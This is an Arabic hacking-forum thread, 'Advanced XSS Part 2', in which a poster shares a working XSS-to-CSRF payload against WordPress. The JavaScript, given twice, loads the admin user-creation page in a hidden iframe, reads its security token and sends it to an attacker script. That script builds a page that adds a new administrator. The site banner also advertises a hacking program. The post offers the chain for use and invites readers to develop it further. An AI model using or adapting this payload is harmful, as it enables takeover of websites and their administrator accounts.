1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. a7mdrat
    rank
    Developer

    عضو منذ:
    ‏7 أغسطس 2012
    عدد المشاركات:
    30
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    [​IMG]
    اليوم راح نعمل تكملة للطريقة الاولى و كيف ممكن تفيدنا اكثر بطرق اجمل

    الشرح الاول هنا :


    اليوم مع التكملة

    الدرس نظري اكثر منه تطبيقي لضيق الوقت شوية و الكسل هههه

    تكلمنا عنا

    XSS to CSRF

    موضوع اليوم نفس الفكرة لكن بطريقة افضل

    يعني ممكن تكتب 1000 استغلال يحدث في رابط واحد هذا هو الهدف

    الفكرة هذه جديدة لم ارها في النت

    ركزوا شوية

    نكمل من الدرس الاول
    كود PHP:
    <iframe id="iframe"  src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>
    <
    script>

      eval (
    "var wptoken=document.getElementById('iframe').contentDocument.getElementsByTagName('input')[1].value"); 

    document.write("<img src=http://127.0.0.1/save.php?xss=" +wptoken+">");

    </script>

    تمام الكود واضح يسحب التوكن ويرسله الى ملف الطريقة حتى الان ما في جديد

    الان ملف save.php

    لايحفظ الكود مثل ما يحفظ الكوكيز في طريقة السرقة المعروفة

    لكن يولد صفحة اضافة ادمين بالتوكن الجديد و يحفظها على السرفر باسم

    add_admin.html

    ثم نعمل لها iframe في صفحة الهدف
    الاستغلال النهائي

    كود PHP:
    <iframe id="iframe"  src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>
    <
    script>

      eval (
    "var wptoken=document.getElementById('iframe').contentDocument.getElementsByTagName('input')[1].value"); 

    document.write("<img src=http://127.0.0.1/save.php?xss=" +wptoken+">");
    </script>
    وطبعا الافرام يكون كامل مخفية عن طريق CSS

    واترك لكم التطوير طبعا!:"

     
    جاري تحميل الصفحة...
  2. ABOJANA IRAQY
    DeveloPer Plus

    عضو منذ:
    ‏10 مايو 2013
    عدد المشاركات:
    106
    الإعجابات المتلقاة:
    74
    نقاط الجائزة:
    75
  3. Mr-Sp!R!T
    Developer

    عضو منذ:
    ‏21 ديسمبر 2012
    عدد المشاركات:
    80
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    I R A Q
    رد: Advanced XSS Part 2

    شكرا على الطرح​
     
الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...